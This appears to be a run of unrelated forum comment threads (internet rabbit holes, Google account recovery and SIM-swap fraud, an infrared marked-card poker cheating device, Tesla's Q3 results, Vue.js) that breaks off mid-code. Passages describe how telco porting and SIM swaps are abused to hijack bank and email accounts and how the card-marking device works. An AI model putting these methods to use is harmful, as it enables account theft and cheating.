San Diego Air & Space Museum archives. Currently they have a quarter million photos there and they're uploading new ones constantly. They have received a huge number of collections from very interesting people. Where else can you see original photos of Glenn Curtiss' first airplane, crashed zeppelin skeletons from World War I, and hyper-advanced Convair Centaur rocket stage manufacturing? Fascinating people in the photos too.

John Baez's This Week's Finds in Mathematical Physics [1]. He started blogging this in 1993! There's so much stuff there now. I keep finding amazing things in the TWFs, and not wanting to close my browser tabs because it's all so precious. And you wouldn't believe what he can do with a bit of ASCII art. Truly he is one of the heroes of the internet. (He doesn't do TWFs anymore, but there are a bunch of other places where he posts stuff.)

Try this one for starters [2]. The earlier ones are much more hardcore.

Very recently I've spent a lot of time on ai.stackexchange.com and electronics.stackexchange.com, so I guess both of those are in contention.

Even more recently, I've been indulging some nostalgia related to my time as a firefighter by spending a lot of time on YouTube looking at videos of structure fires from around the world. It's kind of addictive to play "armchair incident commander" and sit there going "why'd they stretch a 1-3/4" line instead of a 2-1/2"?" or "why didn't the first-in engine lay their own supply line?" or "why aren't they using elevated master streams here?", etc., etc., etc.

These two channels together will give you everything you need to get started and document close to every known glitch in the Pokemon games. Well, that and perhaps TRRose's old website for background on what exactly is going on in these videos, but that got taken down. Bulbapedia probably still has what you need, though:

This is a Tumblr blog going back years, full of extremely disturbing medical imagery and art of the same style. Oftentimes there's almost no context given to the pictures other than the name of the author or a title, which makes them that much weirder. The images also tend to be associated with fascism or BDSM. I've spent at least a few hours trying to find more about some of the pictures because they were just too weird to go without explanation. The guy has one post about how he really values quality and obscurity in his images and nothing else; no explanation as to who he is or why he collects such horrible and terrifying art. I've always wanted to email him and ask what the hell is going on, but I'm kind of scared to know.

Patients given excessive doses of radiation. Lost and stolen Troxler gauges and their recovery (or not). Reactor SCRAMs and their various causes, artfully downplayed with technical jargon. Drunken contractors escorted off reactor sites. 30-year-old flaws discovered in power reactors.

OK, now I have 20+ tabs open and I'm only halfway through the comments. We know how, most of the time, we are compelled to read everything on a page until the end, but we also know how much this attitude costs us.

So from now on I will stop reading and only take into consideration those links posted in response to this comment, if any. Let's see if magic, or coincidence, works!

I advise you to do the same! (If only we could come up with an acronym for this thing!)

Fun to just peruse the stories and spend an hour or two reading. Some of them leave you shaking your head, others leave you feeling warm and fuzzy. And yet others make you want to defenestrate printers... Who knew how much fun people had in tech support and IT?

The start of World War II, how Adolf Hitler came to power in the Weimar Republic, why the Nazis gained power and what motivated them to do what they did. I'm especially interested in the "unknowing participants" of the Nazi regime, like Wernher von Braun and Albert Speer. People who basically bought in to the ideal of a better German world and didn't really consider what that might cost in money, lives, and culture.

Like many others, my productivity has suffered since Wikipedia became a thing. You may consider me a wiki-binger. I even made a simple webapp to curb my addiction: http://www.wikibinge.com/ Still haven't come out of the rabbit hole.

Giant Bomb [0], and if you are a premium member [1] it's even better. There are hours of timeless premium-only videos and podcasts. If you have any interest in video games, it's worth every penny and second invested.

Search anything medical. Don't know what a word means? Look it up on Wikipedia... recursively. Read cited studies. Read studies that cite those studies. You could spend the rest of your life reading this stuff. I've been doing it for years.

I don't have a favorite rabbit hole but rather I've developed a link-hopping habit that pretty consistently leads down the rabbit hole. Basically, while looking at a site/article that interests me, I usually end up doing a separate search for any concepts or organizations mentioned, then seeing what they have to offer. Rinse and repeat.

Speaking of alternative world views and world building... I recently fell into a Wikipedia hole reading about the Islamic view of Angels, King Solomon and how he bent 72 demons to his will, Renaissance magic, and Hoodoo.

The Getting Stronger blog is another wonderful health and fitness blog which focuses on training the mind to thrive in difficult conditions, though it has really amazing insights on diet and training as well: http://gettingstronger.org/about-this-blog/

Because Google doesn't have humans reviewing anything unless there's a direct link to marginal revenue or cost avoidance attached to that interaction that can be priced in. Their business model is to achieve scale through automation and machine learning, which means not doing things that would require manual intervention unless absolutely required.

Explicitly, this means that for free services like Gmail, humans aren't involved. Ever. Try getting support for a Google product and you'll see what I mean -- there's not even a phone number to call or an e-mail address unless it's a paid product (and even then, they've got a less-than-stellar reputation for support of paying customers).

Recently my wife, without any identification, went to T-Mobile and was able to have my account canceled and my number added to a new joint family account.

She went with my knowledge, but T-Mobile never called to confirm.

After that my phone no longer had service, until I installed a new SIM card.

While she did this with my knowledge, I no longer have access to make changes to the account, until she adds me to the list of authorized people, and I lost all my voice mail.

It's very disturbing that she could do this without any sort of checks or authorization.

Also, FWIW, my wife and I do not share a last name, and she did not provide anything other than my phone number to T-Mobile. She was a new T-Mobile customer, and I was an existing customer, albeit on a very cheap pre-paid plan.

I don't think it's possible to make a Google account without a phone number anymore. It's really unfortunate, especially because I deliberately don't set up fallback contacts for my "alternate" gmail accounts, and Google keeps locking them as suspicious when I log in from a second location, and I need to "verify" with a phone number any time that happens (at which point I abandon the account).

I understand that they want to fight spam, but I'd be willing to spend 5 minutes doing captcha type activities in exchange for not requiring a phone number, and that should pretty severely rate limit account creation.

> This pattern seems like something security software should be able to detect: a password reset with incomplete information, followed immediately by a change in recovery email, name, and two-factor-auth settings, coupled with a "my account has been compromised" help request, is highly suspicious.

This series of events could easily occur in legitimate cases. Say you lose or destroy your cellphone. Since you only ever logged in via your phone you don't know the password. Your recovery email was attached to a service you don't use because you normally use gmail. I'm not saying this scenario is a good idea just that it's probably quite common.

As a software developer, I often hear from well-meaning users who are appalled that software didn't do the right thing in some complex scenario that appears to have an obvious solution, because the desired outcome is obvious. In reality, handling the corner cases is complex. Adding these "obvious" solutions to the code easily leads to even worse situations.
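
For what it's worth, the naive version of that detector is trivial to sketch; the hard part is exactly the legitimate corner case above. Every event name and threshold here is invented purely for illustration:

    // Toy rule: a password reset with incomplete info, followed within an
    // hour by several sensitive account changes, gets flagged.
    function looksLikeTakeover(events, windowMs = 60 * 60 * 1000) {
      const reset = events.find(e => e.type === 'password_reset' && e.partialInfo);
      if (!reset) return false;
      const sensitive = ['recovery_email_changed', 'name_changed', '2fa_changed'];
      const hits = events.filter(e =>
        sensitive.includes(e.type) &&
        e.time >= reset.time &&
        e.time - reset.time < windowMs);
      // Note: the legitimate lost-phone scenario described above would also
      // match, which is exactly why a real system needs far more signals.
      return hits.length >= 2;
    }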

I guess 2FA using an authenticator app is the way to go for now. Do you guys agree with the removal of backup phone numbers recommended here? Seems reasonable to me but scary; I've lost my phone(s :( ) before. I do have backup codes generated though.

Once I had my SIM card stuck in my phone. So when I wanted to use a different phone, I bought a new SIM card kit online and brought it to a T-Mobile store. I told the clerk my SIM card was stuck in the old phone, so I wanted to transfer my number to the new SIM card. He asked for my phone number, then scanned the new SIM card and transferred the number. I didn't have to provide any identification or proof that I actually own the number. It's scary how easy stealing someone's phone number can be.

Kind of related, but any Googlers here? Can you please make Google send notifications whenever someone tries to log in to an account and is required to do anything other than typing in their username/password? I REALLY should know when someone is trying to respond to a 2FA prompt or answer my security questions or use SMS or email to reset my password... it's ridiculous that these don't all result in emails right now.

Another issue with sending Google verification reset codes over SMS is that a lot of "Google phones" allow viewing text messages/headers while the phone is "locked." Therefore, if you leave your phone unattended (even for just a few seconds), someone could quickly gain access to the reset vectors. Looking at the DNC leaks, for example: if an attacker had the phone number of a high-profile target, located them in person, and then executed a reset "event", the target would be in very serious jeopardy, assuming the attacker gets physical access to the target's phone for just a few seconds. (Edit: the attacker might also be able to view the phone through a high-resolution camera as the target pulls up the text message, gaining access to the codes without physical access to the device.)

If you are ever required to give a phone number but don't want to, you can use an officially fictional one (numbers reserved for use in fiction, like the US 555-01XX range). This means no one else will have access to it (or be annoyed by it). Same with email addresses.

Using a phone as a login credential is risky from a reliability point of view. At least with passwords and security questions you can (in theory) have 100% dependable access to them anywhere in the world if you memorize them, back them up, or put them on an encrypted USB flash drive or in an encrypted cloud location.

You can't do that with a phone. You can't duplicate your SIM card. If your phone is lost, broken, stolen, or your service is cut off or unavailable for whatever reason, you're screwed. At least with passwords, security questions, or hardware tokens (of which you can have several), you maintain reliable access no matter what if you've made backups.

I think with centralization comes control, arbitrary rules, surveillance, potential for abuse of power, and loss of end-user control.

The fact that it keeps on becoming more and more difficult for individuals to run mailservers cannot be a coincidence.

The solution is decentralization, at least for things like Reddit, mail, search, social, and other similar services. Multiple discrete 'old style' forums, search services, email providers, and individual servers with dispersed control cannot be easily silenced, surveilled, or subjected to arbitrary rules.

I think the usual response is that people don't care, but I think that's because they don't know and may not have stopped to consider the consequences. And, perhaps more important, until now they didn't have to care. Now, increasing creepiness from centralized providers means sooner or later users will wise up.

If parents for instance become concerned about privacy issues they will go out of their way to protect their children and this can lead to new more privacy aware services, rules, and distributed applications. It also makes centralized unicorns based out of SV less of a desirable thing.

Huh. I wonder if the author had seen this video https://m.youtube.com/watch?v=Q00OZ_Xk24w which describes a similar story and recommends a solution based on the same factors (2FA on a number no one knows under a fake name).

But anyway I don't understand why he thinks it's some kind of shocker that this makes it less secure. It's another access method. Recovery options are obviously attack vectors.

In Turkey, if you apply for a new SIM card (say you have a micro SIM and you want a nano), you cannot access your bank account (for example at Garanti Bank, and probably other big banks too). It doesn't matter whether you try to access the bank via your PC or phone or via your home telephone; a message appears saying that your SIM card has been changed and thus you need to re-validate yourself. So this means that the banks and mobile operators share data.

Plus, if you apply for a new SIM card and some information on your ID has changed, such as your father having changed his name or a corrected birthplace, then your ID is sent to the government, and only when the government gives permission can they issue you a new SIM.

Two years ago, I added a friend on to my phone plan so that he could call his sick mother. I made it clear to Telus (my carrier) that he should not be able to modify the account or discuss account details with them, and they assured me that he wouldn't without both my PIN and express permission to add him to the account administrators list. Three months later he walked into a Telus store and got a new iPhone with a 2 year contract on my plan. When he stopped paying what he owed, guess who got stuck with the early termination fee?

All of these require you to provide them. Phone number is given as XXX-XXX-XX12. Email is userna*@domain.com.

Failing all of those options, Google asks you to provide an associated email to help with recovery. It then provides a freeform text field for you to explain the situation and expect a response in 3-5 business days. If you have a secondary less-secured email address this could be a viable vector.

tl;dr: two-factor, if appropriately configured, adds an additional layer of security (more accounts an attacker would have to compromise). Recovery options weaken your security, so be cautious when configuring them.

Does anyone know anything about the security of using other providers (e.g. Twilio or Google Voice) as a recovery number?

Let's say my recovery number is actually a google voice number that's connected to a separate google account, but not forwarded to my actual cellphone (i.e., I'd have to login to my other google account to view the recovery code). Thoughts?

When I set up my two-factor authentication, I noticed my account had a phone number added which I don't recognize at all. The phone number has a Florida area code; I have never been to Florida. I emailed Google about this, asking how the number was added. I didn't get any reply.

I think that for a lot of people, the added access is worth the security risk: they're more likely to forget their own password than to be hacked.

One of my mom's friends had gone through the Gmail password reset process a few times, but she called me one day kind of frantic because she could no longer reset her password (or remember the old one).

It seems that previously Google had allowed either a phone call or an SMS to the phone number on her account, but had recently taken away the call option. Her phone was a landline that couldn't receive SMS messages.

She didn't have (or couldn't access) a backup account and couldn't remember the answers to any of her security questions, or at least not enough of them.

I always thought Google was trying to tie your gmail account back to a cell phone number so they could help end anonymity on the Internet. Or else give the information to the NSA or something. I'm trusting Google less and less these days.

At the very least, Google should not have come out in favor of a particular Presidential candidate. Corporations have become incredibly powerful entities, able to affect the lives of all their employees and many others. If they can't wield this power ethically, they need to be shut down or we risk suffering under fascism.

I imagine adding a phone number to your Google account is more about Google having a particular phone number explicitly linked to an account for their information graph rather than for security reasons.

This is how Russians hacked social media accounts and public emails of British MPs last year.

It is assumed that they procured the IMSI IDs of MPs from open sources (databases of gaming companies (this is why Google lets apps read your IMSI) or advertising cookie brokers).

Then they used Russian cell phone networks to announce a roaming transfer of the phone numbers from BT to themselves, and then used SMS login and password recovery on the victims' Snapchat/Twitter/WhatsApp accounts. Once they logged in, it is believed that they downloaded past conversations and other data through synchronisation APIs.

Back then, Google only confirmed that they did send a recovery SMS to one account, but the hackers didn't manage to answer a security question. This probably deterred them from attempting the same trick on the Google accounts of other MPs whose numbers they pwned, or maybe Googlers simply made that up to cover their asses.

Well of course it makes your account less secure. It's another attack vector. As shown in the post, Google doesn't say add a phone number "to make your account more secure", it says "so you don't get locked out". Intuitively, making it more difficult to get locked out of your own account would likely make it easier for someone else "not to be locked out" of your account.

Google fills my droid with bloatware. Even worse: none of Google's apps will work without Google Play Services, which is a super abusive app; among other things, it logs ALL MY ACTIVITY 24/7. So, if Google already runs apps with such privileges, why not add a small app that mimics WhatsApp's SMS verification? After verifying that a given SIM is installed on the phone where my Google account has been authenticated, it could establish a secure tunnel to send me 2FA codes. Even if a hacker cloned my SIM and had my Google password, they could be prevented from logging in until I grant permission from the first install/verification.

Should I lose or change my phone, Google would not allow a second verification unless a PIN is entered (one I created on the first SIM verification). Another approach, which avoids the PIN, would be a delay before authenticating the second install. If I get 24 hours and a notification that I have logged in on a second device, I certainly have enough time to fix any possible hack.
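
Roughly, that second proposal boils down to a cooling-off window on second-device verification. A toy sketch of the idea, with all names and timings invented for illustration:

    // Second-device verification only completes after a fixed delay,
    // giving the real owner time to see the notification and object.
    const DELAY_MS = 24 * 60 * 60 * 1000; // the proposed 24 hours
    const pending = new Map(); // deviceId -> { requestedAt, objected }

    function requestAccess(deviceId, notifyOwner) {
      pending.set(deviceId, { requestedAt: Date.now(), objected: false });
      notifyOwner(`New device ${deviceId} requested access; object within 24h`);
    }

    function objectTo(deviceId) {
      const req = pending.get(deviceId);
      if (req) req.objected = true;
    }

    function canVerify(deviceId) {
      const req = pending.get(deviceId);
      if (!req || req.objected) return false;
      return Date.now() - req.requestedAt >= DELAY_MS;
    }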

SIM swap fraud has been common in South Africa for years, and bank accounts were being cleaned out before the cell networks tightened their procedures. Now I've started to see reports of similar scams in the developed world.

I'm surprised that anyone is surprised by this. Perhaps the time has come for a more global approach to security.

Would using a dedicated phone number (SIM) that is not shared with any other service protect you from this? Basically nobody besides Google and you would know of this number. In India dual-SIM phones are very common, and I've been thinking of getting a second SIM (phone number) for this purpose.

Google does another stupid thing (or at least it did two years ago, and I think it still does): when you pick Google Authenticator for 2FA and for some reason you can't use it, you can still log in to your account with an SMS code...

Like, WTF, Google? Any attacker could just as easily do that too, anytime they want. As long as this remains true, Google Authenticator (or any other Google security measure that can be bypassed this way with SMS) has literally zero advantages over SMS, while retaining the disadvantage of being less convenient to use, etc.
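
For contrast, here is roughly what the authenticator app computes (RFC 6238 TOTP over RFC 4226 HOTP), sketched with Node's crypto; real apps base32-decode the shared secret first, which is skipped here:

    const crypto = require('crypto');

    // The shared secret never leaves the device or travels over the network,
    // which is precisely the property the SMS fallback throws away.
    function totp(secretBuf, step = 30, digits = 6) {
      const counter = Buffer.alloc(8);
      counter.writeBigUInt64BE(BigInt(Math.floor(Date.now() / 1000 / step)));
      const mac = crypto.createHmac('sha1', secretBuf).update(counter).digest();
      const offset = mac[mac.length - 1] & 0x0f; // dynamic truncation
      const code = (mac.readUInt32BE(offset) & 0x7fffffff) % 10 ** digits;
      return String(code).padStart(digits, '0');
    }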

SS7, phone numbers, and telco stuff are built on trust, with a 1970s/1980s business model from a time when the only people messing with the system were the ILECs.

It's trivially easy to fake scanned documents proving that you're authorized to port a phone number from one service to another. In this case there was probably no SS7 messing about at all, just somebody falsifying the info or socially engineering the victim's cellular carrier into transferring the number to a new phone. Mitnick's "The Art of Deception" is an authoritative resource on this problem.

What are the security implications of using my Google Voice number as a backup phone number for my Google account (the same account)? I've been doing this for a few years, and it's been very convenient. Basically, any time I need to log in with a new browser or device, using the number for two-factor SMS gives me codes in all other logged-in Gmail windows, and on my phone.

AFAICT, and this is supported by the Google screenshot shown promoting the feature, Google doesn't say the phone makes the account more secure, it says that it makes the account more usable, since it provides a way to recover from lockouts. This is one of many cases where usability and security aren't aligned.

I always failed to see why adding a phone number would be somehow more secure. However, I also knew this kind of attack was somewhat common for German online banking accounts using SMS TANs, because service providers were easily convinced to send a new (second) SIM card to an address they had never heard of before.

Ha! My telco in the UK (giffgaff) does not have any phone customer support, so the only way anyone could ask for an account transfer would be through a web form... after logging in to my account. Doing so would also send a notification to my email address. Feels slightly safer now.

TLDR: Telcos really are the weakest link, and you should not rely on your mobile phone number for 2FA.

Background: I have worked in IT security at an Australian bank, and had close ties to the internet fraud department, helping them understand fraudsters' tactics.

Many banks use SMS for 2FA. Australia has a law regarding how long it should take customers to switch telco providers (called 'porting', because you retain your phone number) and the timeframe in which this must be completed (90% within 3 hours, 99% within 2 business days). If the telco doesn't complete the port in this time period, you can raise a complaint with the Telecommunications Industry Ombudsman.

Example: If you are currently with Telco A, to port your number to another company, you call Telco B and provide your details. They take care of the porting process, and you can have your service running on a new phone and SIM within 3 hours.

"All you need to have with you is your mobile number, the name of your old mobile provider, your account type (pre- or post-paid) and your account number. We'll handle the porting process from there. It can take from three hours to three days, but we try to do it as fast as we can."Source: https://www.cnet.com/au/news/switching-telcos-easier-than-yo..., 2012

To make matters worse, the fraudsters would then change the details at the new Telco B (i.e. my address is now 123 Rainbow Road, and my mother's maiden name is Smith, not Jones). When the victim called Telco B, after Telco A told them a porting request had been completed, they'd say "Sorry, we have no idea who you are, and the details you're providing don't match our records". It can take days to sort the whole thing out, by which time your internet banking has been compromised and funds transferred out.

This was a major problem for Australian banks, because they cover the losses for customers if you lose funds as a result of Internet Banking, as long as you weren't negligent (e.g. you left your Internet Banking logged in on a public computer in a library, or something).

If you are relying on your telephone number as a security mechanism, I would change to something else. Something you have, ideally (Google Authenticator, a physical hard token, etc.).

The phone companies have horribly bad security practice. I once had a phone number taken over by someone. When asked, the phone company just said, oh, someone called in and wanted to take over the billing of the account, so we let him. WTF.

This is a serious problem. At some banks, having access to a phone allows the attacker to log in to the web client and transfer money out of the account. And many web services rely on SMS as a method of password recovery.

I've also noticed that there's something very surprising about how Google has implemented their 2FA. When I log into Gmail from a new computer, it does not text me an authentication code and then lock me out of the account until I enter the code. Instead it lets me into my account immediately with only a password, and then sends my phone a notification that someone has logged in from a new computer. Ignoring this notification has no consequence for the logged-in computer. Convenient indeed, but this is really not how I expect 2FA to work, and does nothing to prevent an attacker from reading the contents of your emails or sending fraudulent emails with nothing but a password.

"Right now there is some scary technology coming out of China that incorporates IR marked cards, concealed cameras and computer analyzers. Combined to create a high-tech card marking system, I must say that this device could do for cheats what silicon did for the cosmetic surgery business. The devices are being marketed as poker analyzers."

"The technology works like this. The long edge of every card in the deck is marked with an invisible IR marking. Each mark identifies an individual card. In collusion with a poker dealer, the special marked deck is swapped into play. The player sits opposite the dealer on the table. He positions a concealed camera on the table (usually disguised as a cell phone). The camera has an IR lens that is used to transmit an image of the edge of the deck of cards to a small computer located in a smart phone (the poker analyzer) in his pocket. The image is transmitted during the period after the dealer has shuffled the cards and the deck is resting in front of the dealer before cards are dealt to the players. The IR snapshot of the cards looks like a barcode. The poker analyzer identifies every card in the order that they will be dealt to the players in less than a second. A computer-generated voice message is sent to the player via a Bluetooth mini earpiece communicating the rankings of all the hands on the table."

And the countermeasures:

"Most surveillance cameras, in their natural state, actually have infrared viewing capabilities. The problem is the picture is not so good, so manufacturers add a cut filter over the CCD chip to block out infrared light.... A number of major surveillance camera systems provide end users the ability to remotely change the IR status of the camera via the operators keyboard. This allows the operator who suspects someone is marking cards at a table to use a PTZ camera assigned to the table to switch to IR mode so the cards can be checked live on the game. If you currently dont have this feature, speak to your manufacturer."

An interesting bit of computer history trivia is that Claude Shannon co-invented the first wearable computer with Ed Thorp to beat roulette in Vegas in 1961. It used a button in the shoe as an input device for the user to record the speed and location of the ball which was used to infer the likely ending location using orbital decay algorithms. An auditory signal was then sent by wire to an earpiece to let the user know where to place bets (it wasn't pinpoint accurate - the user would bet on 8 numbers which still gave him a positive expected value).
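
The math behind that trick is simpler than it sounds: time a couple of revolutions, fit an exponential decay to the ball's angular velocity, and integrate forward. A toy sketch, with every constant and simplification made up for illustration (real wheels involve friction regimes and bounce that this ignores):

    // t1..t3: three successive passes of the ball past a fixed point.
    // dropOmega: angular velocity at which the ball falls off the track.
    // wheelOmega: the (roughly constant) rotor speed. 38 pockets, US wheel.
    function predictOffset(t1, t2, t3, wheelOmega, dropOmega, pockets = 38) {
      const w1 = 2 * Math.PI / (t2 - t1);            // speed over revolution 1
      const w2 = 2 * Math.PI / (t3 - t2);            // speed over revolution 2
      const k = Math.log(w1 / w2) / ((t3 - t1) / 2); // exponential decay constant
      const tDrop = Math.log(w2 / dropOmega) / k;    // time until drop speed
      const ballAngle = (w2 / k) * (1 - Math.exp(-k * tDrop)); // radians to go
      const rel = ballAngle - wheelOmega * tDrop;    // angle relative to rotor
      const n = Math.round((rel / (2 * Math.PI)) * pockets) % pockets;
      return (n + pockets) % pockets; // pockets ahead of the one under the ball
    }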

The article says this device is used to cheat in Vegas, but I don't see how that would be possible since you have to bring your own cards. It's hard to imagine casinos colluding on this, so I guess they're talking about private games that happen to be in Vegas?

The technique with the markings on the edge of the card is also used in a well known card magic routine - but using wax instead of infrared ink, so you can feel the slight differences in texture when you handle the card (though only if you're paying attention to it).

This is an impressive breakdown of an even more impressive device. Realtime(ish) cheating software running on custom concealed hardware in a lookalike device? Used for scamming high rollers in private games? Color me fascinated.

I wonder how long this has been around. I would be very interested to hear from anyone who knows how long these have been available/prevalent. My apologies if this is somewhere in the video, I have not been able to watch it yet.

This seems like it'd be mostly used in private games, of which I'm sure there are a huge number. Many of those are probably also going to be pretty high stakes, and if someone loses a bunch they may not be inclined to go to authorities and claim cheating - if said authorities would do anything anyways. ("Awww, you lost your money in an off the books backroom private game? Perhaps next time you'd like to try one of our fine professionally run casinos.").

I suspect that most casinos are set up with surveillance designed to catch point source IR LED illumination these days.

Hmm, with a good enough camera you theoretically ought to be able to see and then memorize the idiosyncrasies of each card in any deck, and then take it to any table in Vegas. I'd say it's possible now, although too slow and expensive, and recognizing the same card as the same card from every side is obviously the hardest part. The camera and light would probably be a fair amount larger, too.

I think it would be easier to count cards than to rely on something like this. Sure, you're still working with odds, but then you don't have a device and marked cards, which limits your exposure to having something horrible happen to you in some back-room game.

Why would you specifically mention "Chinese made" in the title? The actual article has a different title. Also, why does the fact that this device is made in China say anything about the device itself?

This is pretty silly. No casinos or card rooms let you have a phone/device at the table.

That aside, you need to have a special marked deck. People have tried something similar with fluorescent ink and special glasses. I think professional shuffling machines have some kind of built-in blacklight check for this now. IR is a bit better, since it's harder to detect without a camera. You would still need to have a tub of ink and manually mark the cards, though.

You'd basically need to have the dealer in on it, and if that is the case you don't really need the device at all.

Really great news! But something that shouldn't be overlooked is the discounts they gave in Q3 to push deliveries up.

First, those that know me know that I am a Tesla FANATIC. My girlfriend once challenged me to not talk about Tesla (motors, energy, something) for a 24 hour period. I dunno if I've ever done that honestly. I'm also an owner (no surprise given my fanaticism, lucky to be able to afford one). And I also own some TSLA.

Elon sent a company-wide email in Q3 to push sales to show profitability. I don't think it's a fluke, but they did something they never really do to help reach this number: they offered significant discounts on vehicles (new, pre-owned, showroom). Like, really big discounts (relative to the price of the car).

That certainly helped. Elon also sent an email at the start of Q4 that NO MORE DISCOUNTS are allowed. So I'm really very interested to compare Q3 to Q4 when that comes.

I also happen to know that a lot of the people who bought a heavily discounted Tesla in Q3 feel kind of burned that right at the beginning of Q4 Tesla announced the new Autopilot hardware (which isn't retrofittable on old vehicles). If you did your homework on Tesla, though, this wasn't a surprise. It was expected that Tesla would make some big announcement to spur Q4 sales, especially after Elon said there wouldn't be any capital raises in Q4 while he expected to hit Q4 numbers. You generally can't do that without some big news.

The Economist recently did a good article on the financing of Elon Musk's companies that flew under the radar of Hacker News and probably warranted further discussion [1] [2]. (Though the author of that piece completely misses the relative importance of each company to Musk, suggesting "he could try to sell [...] SpaceX, through gritted teeth, to a defence firm".)

It's unfortunate there's a bit of a reality distortion field around discussion of Elon Musk's companies sometimes. Maybe because everyone wants his companies to succeed...

Relatedly, at the beginning of Q3 Elon Musk sent an email to employees urging them to cut costs:

> I thought it was important to write you a note directly to let you know how critical this quarter is. The third quarter will be our last chance to show investors that Tesla can be at least slightly positive cash flow and profitable before the Model 3 reaches full production.

> Total Q3 GAAP revenue was $2.30 billion, up 145% from Q3 2015, while total Q3 gross margin was 27.7%, compared to 21.6% in Q2. Total automotive revenue was $2.15 billion on a GAAP basis, up 152% from Q3 2015. Our final Q3 delivery count was 24,821, over 300 more than the estimated delivery count we shared on October 2nd. Deliveries increased 114% from the third quarter of 2015, and was comprised of 16,047 Model S and 8,774 Model X vehicles. In addition, 5,065 vehicles were in transit to customers at the end of the quarter. These vehicles will be delivered in Q4.

I imagine this is because the majority of revenue is spent on growing the business rather than becoming profit (as profit = revenue - expenses), since Tesla still has a lot more room to grow. The same approach Amazon took for years, until recently.

One thing to note, I have a few friends who work at Tesla service centers. They cut A LOT of corners when it comes to service to show profits this quarter. For example, for the location that one of my friends works at (which happens to be one of the busiest locations in Southern California), they sold almost every single loaner vehicle as a used car.

I'm impressed by, and skeptical of, the substantial increase in production. A 70% increase in production in one year would likely require substantial changes in the production stages. Hopefully Tesla didn't cut any corners to hit this production number; I'm hopeful that they just scaled back their production initially and are now showing their "full potential", or added a lot of new machinery to their production line(s). Maybe they will reach the 500,000 target.

I do very little web these days, mostly working on backend data processing, network I/O and distributed comms.

A bit over a year ago, I wanted a real-time web UI to visualize some of the data I had on server-side, which I was trying to do using SignalR. I went back through some of the popular frameworks, with a pretty simple mindset of "Can I read the 'getting started', and get something basic working in about 15 minutes?".

I ended up choosing Vue, mainly because it used simple objects for models and I could literally just pass stuff I got from SignalR directly into it and have it show up. Almost everything else I tried had some type of wrapper/proxy around the data, which meant you had to run through some mapping exercise to get models working. I was close to deciding on Mithril, but when I found Vue it just clicked with me way more. I actually really wanted to do React, but Vue was just so much more approachable that I couldn't justify spending the extra time learning React.

The real test however came months later, when I went to modify and add more functionality to my simple debug UI. I was able to pick it up nearly instantly, and even made some fairly substantial changes.

Contrast to my experience with say, Ember. We have a big app written in Ember, and every time I try to do even what I think should be a simple change (after not touching it for months), it takes me 5 times longer than I thought, and I end up spending most of the time fighting with it before realizing I forgot one of the 5 places you have to modify to reference an additional dependency, or some other equally trivial but infuriating detail.

You can learn the basics of Vue in minutes, and be quite adept within hours of it. That's something not a lot of frameworks can claim, and it's a seriously underrated benefit.

As someone who went through the complete frontend hype-trains (jQuery, Backbone, Angular, Ember, React, all in production): Vue.js 2.0 with single-file components is exactly what everyone has been looking for so desperately.

- performance: faster than react now

- learning curve: a few hours from scratch

- getting started: cli-tool for initial scaffold & configuration

- components: simple .vue files with a <template/>, <script/> and <style/>. Super easy to get going, no need for JSX

- "official" packages for routing, ajax and state management. No wasting of days for choosing every tiny package for days

- vuex 2.0 is one of the cleanest flux implementations I've seen in the last year

... and much more. Give it a try with the full webpack template of the cli tool!

I actually interviewed with Jacob Schatz when he was trying to figure out which frontend framework to use for GitLab. I had been working in React for the last year or so which was apparent on my resume.

He prefaced our interview with something to the effect of "I know you do a lot of React but we are not going to ever use React at GitLab"

It was weird. I tried to ascertain his reasoning and pretty much all I got was "just because it's popular doesn't mean it's good".

Regardless, I think GitLab is an awesome company; I just got the feeling Jacob wanted to use Vue.js because it wasn't the most popular choice. ¯\_(ツ)_/¯

The thing I like about React is that I don't have to think about the DOM. As soon as I see "el: #id" it's basically over for me. I don't want to think about DOM elements, or at least minimize my exposure to them.

And it's not just that I don't like to think about the browser DOM. It's that I don't want my UI coupled to the DOM. Obviously your UI will be coupled to the DOM to some extent, but React minimizes that. What I love about React is not just `react-dom` but also, say, `react-canvas`, or that you can apply the same principles and work with React Native.

But hey, the more software libs to play with and choose from, the merrier! Cheers!

I am more and more of the opinion that you should NOT use a JS framework for long-term projects (those spanning more than a few years), but just use vanilla JS with some libraries that you can easily swap out when something better comes along. Vue.js is here today, and it is nice, but tomorrow gintzx.js comes out, the community will be flabbergasted, everyone will use it, and Vue.js will slowly die. Making big, complex webapps with just some libs is absolutely possible. Just choose them wisely and make a good directory structure.

As a primarily backend dev, I'm very comfortable with React and I don't particularly want to switch to Vue.js. React tells me: learn the HTML basics and then deal with abstractions (proof: React Native!). Vue.js tells me: deal with HTML templates, every time, everywhere. Although we end up dealing with HTML in React anyway, I think it's easier for a backend dev with no front-end experience at all to grasp. I showed React to an old Java dev and he said that React reminded him of some Java web frameworks like Wicket or JSF. I guess Vue.js would have scared him.

OK, so I've built stuff in Vue.js, React, and Angular, and I need to understand all the rage. I mean, Vue.js is just like Angular but with fewer features? I like that it's slimmer, don't get me wrong, but I just don't understand the "woah, Vue.js is the shit!" when we've had Angular for so long.

There's something that irks me about incorporating logic into templates. UI development is hard enough without having to bounce between js and templates to figure out how a component is actually going to behave. I haven't used Vue or React, so this is all just my gut speaking, but at least with React all the logic is there in front of you.

In my mind, if there's a loop or a conditional or whatever piece of logic that decides what will actually show up, that should happen where the underlying data/models are actually built, and whatever acts as the view just spits the result into place.

I'm still a scrub when it comes to web and UI development, so I may be speaking out of inexperience.

A long time ago (7-10 years ago) Web 2.0 was the craze. It was the beginning of making interactive web applications.

There were a few major players that were even backed by companies: Dojo, Prototype, GWT (and like 4 more that I can't remember).

These libraries were complicated and were generally component based with their own flair of inheritance. You could not iteratively enhance your existing web 1.0 app. You had to throw it out and start over again (the markup and all).

Then along came jQuery, and I remember distinctly saying to myself this is the library, because I could progressively/iteratively add it to our existing crap (circa 2006-10). I still pat myself on the back for being right about that library being successful (I actually forced a previous employer to use jQuery over GWT and Dojo).

Progressive enhancement is a great marketing point so maybe Vue.js will pull a jQuery :)

Personally I want Elm to take off but it doesn't really reuse existing knowledge.

To me Vue is a great tool for side projects. In React I found myself struggling to figure out what libs to use and keep myself up to date with them. I also hated configuring webpack. With Vue, I have officially supported libraries like vuex and vue-router which work great with Vue out of the box. vue-cli also allows me to scaffold projects with these libraries very easily.

But the thing I like most about Vue is that it allows me, someone who identifies as a front-end dev or design-coding hybrid, to quickly iterate and build prototypes. Look at the single-file component:
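
(Something like this toy counter, purely illustrative; the component and names are made up:)

    <!-- Counter.vue: a toy single-file component -->
    <template>
      <button @click="count++">Clicked {{ count }} times</button>
    </template>

    <script>
    export default {
      data() {
        return { count: 0 };
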